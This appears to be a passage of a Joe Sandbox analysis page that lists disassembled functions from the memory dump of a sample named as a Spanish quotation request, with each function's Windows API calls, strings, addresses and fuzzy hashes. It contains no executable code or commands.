Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: cecfb7ed86c8ac90e0ba1b8300c6079599e216d10c2a2733f83479e443e7a208
Instruction ID: 2668381d55c485d975060431e656ac394c82ce665641a439c73edc281d004c47
Opcode Fuzzy Hash: cecfb7ed86c8ac90e0ba1b8300c6079599e216d10c2a2733f83479e443e7a208
Instruction Fuzzy Hash: 3DE0E536004101BBDB016FA1FE0C94ABF39FF49B22B208222F22981070CB329420DF68

Function 0020BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0020BEB3

Strings

D%-, xrefs: 0020BDED, 0020BD91, 0020BD1B
D%-, xrefs: 0020BE9A
D%-D%-, xrefs: 0020BCA5
D%-, xrefs: 0020BCA2

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%-$D%-$D%-$D%-D%-
API String ID: 1385522511-1171869334
Opcode ID: 00e3efd833e8018ca6b4a7034095d41f8a1cba6fb197a49dc40a47ffafc91e64
Instruction ID: cdc163256b648c07231792a5213400e74abca8dfdc9ca3e28dee56ae1dc30a32
Opcode Fuzzy Hash: 00e3efd833e8018ca6b4a7034095d41f8a1cba6fb197a49dc40a47ffafc91e64
Instruction Fuzzy Hash: 6E916B75A2030ADFCB29CF58C090AA9B7F1FF58310F64416AD941AB392D771ADA1CB90

Function 00287B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00220242: EnterCriticalSection.KERNEL32(002D070C,002D1884,?,?,0021198B,002D2518,?,?,?,002012F9,00000000), ref: 0022024D
Part of subcall function 00220242: LeaveCriticalSection.KERNEL32(002D070C,?,0021198B,002D2518,?,?,?,002012F9,00000000), ref: 0022028A

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

Part of subcall function 002200A3: __onexit.LIBCMT ref: 002200A9

__Init_thread_footer.LIBCMT ref: 00287BFB

Part of subcall function 002201F8: EnterCriticalSection.KERNEL32(002D070C,?,?,00218747,002D2514), ref: 00220202
Part of subcall function 002201F8: LeaveCriticalSection.KERNEL32(002D070C,?,00218747,002D2514), ref: 00220235

Strings

5, xrefs: 00287C78
+T%, xrefs: 00287E2E
G, xrefs: 00287C7F
Variable must be of type 'Object'., xrefs: 00287C3A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +T%$5$G$Variable must be of type 'Object'.
API String ID: 535116098-2187542652
Opcode ID: 697bf0b6784ae44ed9211f69d670758f81846c3188cded7c8bc77ebbbc8178af
Instruction ID: 8ddf2989590a2623cd45d5f87f0b79f6ae24b564e2cece9352dcbd0f0a44ac2d
Opcode Fuzzy Hash: 697bf0b6784ae44ed9211f69d670758f81846c3188cded7c8bc77ebbbc8178af
Instruction Fuzzy Hash: 28917E78A25209EFCB14EF54D891DADB7B1FF45300F60805AF8069B292DB71EE61CB51

Function 0026C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00207620: _wcslen.LIBCMT ref: 00207625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0026C6EE
_wcslen.LIBCMT ref: 0026C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0026C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0026C7CA

Strings

0, xrefs: 0026C6AF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: ef1c088f50b63b99197854841aecfb8cc188008bad70164dc73224551b7912b5
Instruction ID: 9fcf6455bb8ed4adc80cbb49b5a02f7a483f3dbad4d3528fa358d6dd8fc422a5
Opcode Fuzzy Hash: ef1c088f50b63b99197854841aecfb8cc188008bad70164dc73224551b7912b5
Instruction Fuzzy Hash: 1B51E0716243029BD712AF28C885A7AB7E8AB85314F240A2AF5E5D31D1DB60DCA48F56

Function 0028AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0028AEA3

Part of subcall function 00207620: _wcslen.LIBCMT ref: 00207625

GetProcessId.KERNEL32(00000000), ref: 0028AF38
CloseHandle.KERNEL32(00000000), ref: 0028AF67

Strings

@, xrefs: 0028AE72
<, xrefs: 0028AE6B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 57423765512578cff6e41459a1ed07ae4add158971756d5ef71635076656952b
Instruction ID: ad7168f954805dea8fb1d55313d4d5a507b2f5615b83efb66a4bd1fa54e8a22f
Opcode Fuzzy Hash: 57423765512578cff6e41459a1ed07ae4add158971756d5ef71635076656952b
Instruction Fuzzy Hash: E7717974A10615DFDB14EF54C484A9EBBF0BF08310F0484AAE816AB7A2CB75ED91CF91

Function 0026719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00267206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0026723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0026724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002672CF

Strings

DllGetClassObject, xrefs: 00267242

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: cfcd329648fb2ff5d952ae03b1eded2d827412db3cb21ad80bf385581e6d959f
Instruction ID: 3202e08c1204e2c86e84e2b889e02eb842275f7ec519ab05436eb9716efb6435
Opcode Fuzzy Hash: cfcd329648fb2ff5d952ae03b1eded2d827412db3cb21ad80bf385581e6d959f
Instruction Fuzzy Hash: 91418171614204EFDB15CF64D894B9A7BB9EF44318F2480AEFD099F24AD7B0D994CBA0

Function 00292F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00292F8D
LoadLibraryW.KERNEL32(?), ref: 00292F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00292FA9
DestroyWindow.USER32(?), ref: 00292FB1

Strings

SysAnimate32, xrefs: 00292F68

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 145b21f1933badbdb74b6aae56769ff73893a6de12b7e1f066cd804ba0b176c0
Instruction ID: 720b3368de4479aedf13bef1179c599063685ee41fe52773ffad3b23ba81f72a
Opcode Fuzzy Hash: 145b21f1933badbdb74b6aae56769ff73893a6de12b7e1f066cd804ba0b176c0
Instruction Fuzzy Hash: 4B21AC72220206FBEF108F64DC84EBB37BDEB59364F100619F954D2590D771DC659B60

Function 00224D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00224D1E,002328E9,?,00224CBE,002328E9,002C88B8,0000000C,00224E15,002328E9,00000002), ref: 00224D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00224DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00224D1E,002328E9,?,00224CBE,002328E9,002C88B8,0000000C,00224E15,002328E9,00000002,00000000), ref: 00224DC3

Strings

mscoree.dll, xrefs: 00224D86
CorExitProcess, xrefs: 00224D98

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d38a92c3a65193b57ae0bad22d91da536c2a782dc53ee1a52cdcb1fae4174bc2
Instruction ID: 7d999542bca3ef08fefd64b8e838484e6e671afaa831c4319b26ad3d617a50b5
Opcode Fuzzy Hash: d38a92c3a65193b57ae0bad22d91da536c2a782dc53ee1a52cdcb1fae4174bc2
Instruction Fuzzy Hash: AAF04F34A50219BBDB159F90EC4DBADBBB5EF44751F5001A5F909A2260CB305E50CA94

Function 0025D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0025D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0025D3BF
FreeLibrary.KERNEL32(00000000), ref: 0025D3E5

Strings

X64, xrefs: 0025D2A8
GetSystemWow64DirectoryW, xrefs: 0025D3B9

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 09ca670627ac160d8b8e8a1ec72de63a4c5e9d2ba2e500c1b9c95ff17bcb3653
Instruction ID: 75be6c6a261e85b6938122070a1ac8536c7c379f44bc7ff4a6bcc251bb3a3421
Opcode Fuzzy Hash: 09ca670627ac160d8b8e8a1ec72de63a4c5e9d2ba2e500c1b9c95ff17bcb3653
Instruction Fuzzy Hash: 65F05C31835612EBD7715B209C0C9593314AF10703F644596FC06E2115D7B0CDF8CE9E

Function 00204E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00204EDD,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00204EAE
FreeLibrary.KERNEL32(00000000,?,?,00204EDD,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204EC0

Strings

kernel32.dll, xrefs: 00204E94
Wow64DisableWow64FsRedirection, xrefs: 00204EA8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: b75fac30c5bdfb1241e2577399f3e1b6dec8a2e188a96f62dfbb4e1169fe456f
Instruction ID: 2e7e06f7c148e8b0539e1ed845da6b273701c048ef7615ae4fdefda38ba2f056
Opcode Fuzzy Hash: b75fac30c5bdfb1241e2577399f3e1b6dec8a2e188a96f62dfbb4e1169fe456f
Instruction Fuzzy Hash: F8E08675A116235BD3222B25FC1CB5B6554AF82B627154116FD08D2151DB60CD1240E4

Function 00204E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00243CDE,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00204E74
FreeLibrary.KERNEL32(00000000,?,?,00243CDE,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204E87

Strings

kernel32.dll, xrefs: 00204E5B
Wow64RevertWow64FsRedirection, xrefs: 00204E6E

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 3b6903f7d69c6321de231f3f83db75888ba9dec13778506db180c1c9d49e4c8c
Instruction ID: 75d823ae69fd9b498e55bd0854aae1afa45c2ec77476492d969ce3c1b7f22e6e
Opcode Fuzzy Hash: 3b6903f7d69c6321de231f3f83db75888ba9dec13778506db180c1c9d49e4c8c
Instruction Fuzzy Hash: 63D0C231522722578B222F24FC1CE8B6A18AF86B51355861ABA0CA2191CF20CD21C1E4

Function 0028A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0028A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0028A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0028A468
CloseHandle.KERNEL32(?), ref: 0028A63D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: d9c2bd829f264395785c0f7282bc86d681282009be154378526f4d8c46fa2fce
Instruction ID: 965dd1938ee984e92d08e6e045fa6367e298b14af1f130c00a817ee2dd9c26a5
Opcode Fuzzy Hash: d9c2bd829f264395785c0f7282bc86d681282009be154378526f4d8c46fa2fce
Instruction Fuzzy Hash: A7A1D3B56143019FE720EF28C886F2AB7E5AF44714F14885DF55A9B2D2DBB0EC508F92

Function 0023BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,002A3700), ref: 0023BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,002D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0023BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,002D1270,000000FF,?,0000003F,00000000,?), ref: 0023BC36
_free.LIBCMT ref: 0023BB7F

Part of subcall function 002329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000), ref: 002329DE
Part of subcall function 002329C8: GetLastError.KERNEL32(00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000,00000000), ref: 002329F0

_free.LIBCMT ref: 0023BD4B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 41cd3977749c9d1749ce933782e4f1fb5b12edf3fd8757393343d5c42e4b7111
Instruction ID: d58ab5af3ceb3aa4379e815f5c1f8af718bc56533e11d9cb2a91e877be0e342c
Opcode Fuzzy Hash: 41cd3977749c9d1749ce933782e4f1fb5b12edf3fd8757393343d5c42e4b7111
Instruction Fuzzy Hash: 7D51EAB1D10219EFCB21EF65AC8596EB7BCEF41310F1006ABEA54D7291EB705E61CB50

Function 0026E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0026CF22,?), ref: 0026DDFD

Part of subcall function 0026DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0026CF22,?), ref: 0026DE16

Part of subcall function 0026E199: GetFileAttributesW.KERNEL32(?,0026CF95), ref: 0026E19A

lstrcmpiW.KERNEL32(?,?), ref: 0026E473
MoveFileW.KERNEL32(?,?), ref: 0026E4AC
_wcslen.LIBCMT ref: 0026E5EB
_wcslen.LIBCMT ref: 0026E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0026E650

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 7a0138585e07fb6760137daa1ba608e22f8ab8c87293b1e4e4fd9ffe51f6c3c3
Instruction ID: 4c032bf00e88db53b6650d071f6ccbc1cd89b9698a3c0a642b4bb8cf0c52140d
Opcode Fuzzy Hash: 7a0138585e07fb6760137daa1ba608e22f8ab8c87293b1e4e4fd9ffe51f6c3c3
Instruction Fuzzy Hash: 275176B65183855BCB24EFA0D8819DB73DC9F85340F00491EF689D3192EF74A5D88B56

Function 0028B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

Part of subcall function 0028C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028B6AE,?,?), ref: 0028C9B5
Part of subcall function 0028C998: _wcslen.LIBCMT ref: 0028C9F1
Part of subcall function 0028C998: _wcslen.LIBCMT ref: 0028CA68
Part of subcall function 0028C998: _wcslen.LIBCMT ref: 0028CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0028BB63
RegCloseKey.ADVAPI32(?,?), ref: 0028BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0028BBB3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 383050107755d9fcbee5520c721d7835b3a67abedf3362f1c13379ad0a49963f
Instruction ID: 4df43541345b575ae6d522b23f467c2731c281a5cca093b5c7526d0638327300
Opcode Fuzzy Hash: 383050107755d9fcbee5520c721d7835b3a67abedf3362f1c13379ad0a49963f
Instruction Fuzzy Hash: 9C61CE34229241AFD315EF14C490E2ABBE4FF84308F54855DF49A8B2E2CB31ED55CB92

Function 00268BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00268BCD
VariantClear.OLEAUT32 ref: 00268C3E
VariantClear.OLEAUT32 ref: 00268C9D
VariantClear.OLEAUT32(?), ref: 00268D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00268D3B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

